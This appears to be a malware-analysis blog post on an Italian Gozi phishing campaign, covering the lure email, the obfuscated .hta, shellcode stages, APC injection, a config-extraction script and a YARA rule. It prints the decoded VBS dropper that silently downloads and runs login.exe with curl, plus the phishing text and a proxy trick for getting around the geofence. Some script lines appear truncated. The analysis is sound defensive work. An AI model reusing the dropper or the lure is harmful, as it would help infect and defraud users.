In this blogpost I will be going through a recent campaign targeting the Italian audience which impersonate to “The Agenzia delle Entrate” (Italian Revenue Agency) luring the victims to execute and be part of Gozi botnet.

The Phish

A massive malspam email campaign was spreading around the globe targeting italian individuals impersonating to Agenzia delle Entrate letting the users know that there is some problem with VAT and payment related documents:



Dear Customer,from the examination of the data and payments relating to the Communication of periodic VAT eliminations, which you presented for the quarter 2023, some inconsistencies emerged.The notifications relating to the inconsistencies found are accessible in the “Tax box” (the Agency section)accessible from the Revenue Agency website ( and in the complete version in the archive attached to the current e-mail.This e-mail was created automatically, therefore we recommend that you do not reply to this e-mail address.Verification office,National Directorate of the Revenue Agency

The mail contains an attachment: AgenziaEntrate.hta which is part of the Social Engineering technique the threat actor tries to apply by letting the user know in the mail that he isn’t suppose to reply back to the mail (as it’s an automatically created mail) and the only choice left for the user is to download and open the attachment.

Execution Chain

Below you can see a diagram of the execution chain from the moment the phishing mail was opened:



As I’ve mentioned the email has an .hta attachment. the hta file contains inside of itself a few empty lines at the beginning and afterward a quite good amount of nonsense data:


So the first thing I’ve noticed is obfuscated code inside of script tags:


After cleaning the script abit we can see clearly what happens here:


The script simply takes escaped string and unescaping it.

Below is a quick script that does the job, after unescaping the string a URL decode operation was required also to see clearly the output:

import urllib.parse

escapedStr = "do\143u\155%65\156t%2E\167%72%69%74e%28%27%3C%27%2B%27%73%63\162i\160%74%20l\141%6E\147%75ag%65%3Dj\163\143%72i\160%74%2Een\143%6Fd%65%3E%27%29"
unicodeDecodedStr = escapedStr.encode('utf-8').decode('unicode_escape')
urlDecodedStr = urllib.parse.unquote(unicodeDecodedStr)

document.write('<'+'script language=jscript.encode>')

Jscript Encode

As we can see from the output, the content is encoded using jscript.encode and it can be decoded using this tool.
After decoding the encoded data, the script will unescape a huge blob of data:


Using online tool such as CyberChef I’ve URL decoded the blob of data and at the first part of the data looked like obfuscated JS code, but when I’ve scrolled down I found out another script written in VBS:


Window.ReSizeTo 0, 0
Window.MoveTo -4000, -4000
set runn = CreateObject("WScript.Shell")
dim file
file = "%systemroot%\\System32\\LogFiles\\" & "\login.exe"
const DontWaitUntilFinished = false, ShowWindow = 1, DontShowWindow = 0, WaitUntilFinished = true
set oShell = CreateObject("WScript.Shell")
oShell.Run "cmd /c curl -o %systemroot%\\System32\\LogFiles\\login.exe ", DontShowWindow, WaitUntilFinished
runn.Run file ,0

Clearly the script tries to download external payload and drop it to the user’s disk at C:\Windows\System32\LogFiles\login.exe

Italy Geofence Bypass

The payload that the script tries to retirve utilize the Curl command.
I’ve tried to download the file and got the error: curl: (52) Empty reply from server


So after digging throught the flags of Curl, I found the -x flag which allow access the URL through a proxy.
So I looked for HTTP proxies in Italy ( And by executed the below command I’ve managed to retrieve the payload:

curl -x -o C:\Users\igal\Desktop\AgenziaEntrate1.bin



In this part I will be covering the intial loader and going through some of it functionalities. I’ve opened the loader in IDA and the first thing that caught my attention was the huge .data section:


It’s a good indication that we’re seeing a packed binary.
Now going through WinMain there is a single call to a function before the termination of the program:



This function will be the actul main function of the loader, it will call the function mwDecryptWrapper_4041AE which will be the wrapper function for the decryption routine and those will be the function arguments:

  1. ShellCode allocated memory
  2. Blob1 Length
  3. Blob3 Data

image-3.png image-4.png

The wrapper function will then call mwDecrypt_4040D8 and eventually the last function that will be called before sub_40471B ends will be mwExecGoziShell_4042A6:

image-5.png image-6.png

The function will jump into the allocated memory that it’s data was previously decrypted.

Dynamic Analysis

Lets see this in the dynamic view:
Decryption Phase:


Jump To ShellCode:


1st ShellCode

Now that we’ve entered the 1st ShellCode, We can simply dump it and open it in IDA to futher static analyze it before we dynamically finding our next interesting POI.

Dynamic API Resolve

The first thing the ShellCode will do is resolving API’s it will need to further execute some function, it will be done by using a technique called PEB Walk and will combine inside of it hashes that simple google can help us to retrieve the hashes values, those are the API’s that will be resolved:

  • LoadLibraryA
  • GetProcAddress
  • GlobalAlloc
  • GetLastError
  • Sleep
  • VirtualAlloc
  • CreateToolhelp32Snapshot
  • Module32First
  • CloseHandle



Then In order to jump to the next stage ShellCode a new memory will be allocated using VirtualAlloc that was previously resolved and then the next shell will be written in the freshly allocated memory (after decrypting it[decryptShellCode2_4F2]), and after that the function will jump to the ShellCode:


2nd ShellCode

Same as the first ShellCode, the second ShellCode will start by resolving API deynamically, those are the API’s it will resolve:

  • VirtualAlloc
  • VirtualProtect
  • VirtualFree
  • GetVersionExA
  • TerminateProcess
  • ExitProcess
  • SetErrorMode

After the API’s were resolved the ShellCode will use VirtualAlloc to create a new memory section (0x230000):


Then a decryption loop will occur which will resolve and overwrite the freshly allocated memory with an executable binary:


At this point I’ve dumped the binary and moved to analyze it.

Gozi Loader

I’ve tried to upload the binary to and instantly got a result that they found it’s Gozi binary statically:


Which made me a bit confused because I know that Gozi stores references to it’s config below the section table (and there supposed to be 3 config entries)


So I’ve opened IDA and tried to look what’s going on with this binary, it contains a small amount of function (about 30) and in the “main” function, it will simply hold a reference to another function and will use the API ExitProcess in order to execute this function:


APC Injection

I was hovering over the function mwMainFunc_4019F1 and suddently saw a call to the API QueueUserAPC


The main thing we need to know about APC Injection is that the first argument passed to QueueUserAPC will be the malicious content that the executed thread will execute. (In this case the developers of Gozi used the API SleepEx in order to perform the injection)
In this case the first passed argument is actually a function pfnAPC_40139F which will decrypt the final Gozi payload and execute it using ExitThread


Lets see this in the debugger: APC Injection:


Final Payload Decryption Routine:


Now I can dump the final payload and see whether or not I can extract some configs out of it.

Gozi Binary

I took a look below the section table and now we have 3 config entries as I would’ve expected:


I won’t be going over Gozi’s capability but what was interesting for me is extracting the configurations for it, so I’ve read about how Gozi handles the configuration and how to work around it using SentinelOne blog about gozi and this was my final script:

import pefile
import re
import struct
import malduck
import binascii

FILE_PATH = '/Users/igal/malwares/gozi/01-03-23/8. final.bin'

FILE_DATA = open(FILE_PATH, 'rb').read()

def locate_structs():
    struct_list = []

    pe = pefile.PE(FILE_PATH)

    nt_head = pe.DOS_HEADER.e_lfanew
    file_head = nt_head + 4
    opt_head = file_head +18
    size_of_opt_head = pe.FILE_HEADER.SizeOfOptionalHeader
    text_section_table = opt_head + size_of_opt_head + 2
    num_sections = pe.FILE_HEADER.NumberOfSections
    size_of_section_table = 32 * (num_sections + 1)
    end_of_section_table = text_section_table + size_of_section_table
    jj_struct_start = end_of_section_table + 48
    structs = FILE_DATA[jj_struct_start:jj_struct_start + 60]    
    return structs.split(b'JJ')[1:]

def convertEndian(byteData):
    big_endian_uint = struct.unpack('>I', byteData)[0]
    little_endian_uint = big_endian_uint.to_bytes(4, byteorder='little')
    return little_endian_uint.hex()

def blobDataRetrieve(blobOff, blobLen):
    pe = pefile.PE(FILE_PATH)
    configOff = pe.get_offset_from_rva(blobOff)
    blobData = FILE_DATA[configOff:configOff + blobLen].split(b'\x00\x00\x00\x00\x00')[0]
    return blobData
def aplibDecryption(config_data):
    ptxt_data = malduck.aplib.decompress(config_data)
    entry_data = []
    for entry in ptxt_data.split(b"\x00"):
        if len(entry) > 1:
    return entry_data

def decodeC2(dataArray):
    for data in dataArray:
        if data.isascii() and len(data) > 20:
            c2List = data.split(' ')
            for c2 in c2List:
            	print(f'\t[+] {c2}')

dataStructs = locate_structs()

for data in dataStructs:
    crcHash = convertEndian(data[6:10])
    if crcHash == 'e1285e64': #RSA Key Hash
        blobOffset = int(convertEndian(data[10:14]), 16)
        configOff = pe.get_offset_from_rva(blobOffset)
        print(f'[*] RSA Key at offset:{hex(configOff)}')
    if crcHash == '8fb1dde1': #Config Hash
        blobOffset = int(convertEndian(data[10:14]), 16)
        blobLength = int(convertEndian(data[14:18]), 16)
        blobData = blobDataRetrieve(blobOffset, blobLength)
        decryptedData = aplibDecryption(blobData)
        print('[*] C2 List:')
    if crcHash == '68ebb983': #Wordlist Hash
        blobOffset = int(convertEndian(data[10:14]), 16)
        blobLength = int(convertEndian(data[14:18]), 16)
        blobData = blobDataRetrieve(blobOffset, blobLength)
        decryptedData = aplibDecryption(blobData)[0].split('\r\n')[1:-1]
        print('[*] Wordlist:')
        for word in decryptedData:
            print(f'\t[+] {word}')
[*] RSA Key at offset:0xa800
[*] C2 List:
[*] Wordlist:
	[+] list
	[+] stop
	[+] computer
	[+] desktop
	[+] system
	[+] service
	[+] start
	[+] game
	[+] stop
	[+] operation
	[+] black
	[+] line
	[+] white
	[+] mode
	[+] link
	[+] urls
	[+] text
	[+] name
	[+] document
	[+] type
	[+] folder
	[+] mouse
	[+] file
	[+] paper
	[+] mark
	[+] check
	[+] mask
	[+] level
	[+] memory
	[+] chip
	[+] time
	[+] reply
	[+] date
	[+] mirrow
	[+] settings
	[+] collect
	[+] options
	[+] value
	[+] manager
	[+] page
	[+] control
	[+] thread
	[+] operator
	[+] byte
	[+] char
	[+] return
	[+] device
	[+] driver
	[+] tool
	[+] sheet
	[+] util
	[+] book
	[+] class
	[+] window
	[+] handler
	[+] pack
	[+] virtual
	[+] test
	[+] active
	[+] collision
	[+] process
	[+] make
	[+] local
	[+] core

Yara Rule

The below rule was created to hunt down unpacked binaries:

import "pe"
rule Win_Gozi_JJ {
		description = "Gozi JJ Structure binary rule"
		author = "Igal Lytzki"
		malware_family = "Gozi"
		date = "15-03-23"
        $fingerprint = "JJ" ascii
        $peCheck = "This program cannot be run in DOS mode" ascii
		all of them and #fingerprint >= 2 and for all i in (1..#fingerprint - 1): (@fingerprint[i] < 0x400 and @fingerprint[i] > 0x250 and @fingerprint[i + 1] - @fingerprint[i] == 0x14)

You can see the result of proactive hunt using yara hunt


In this blogpost we went over a recent Gozi distribution campaign that was targeting the Italian audience.
The developers added some extra layers of protection to insure the payloads are being opened by Italian only users and by this bypass AV’s to identify the retrieved payload.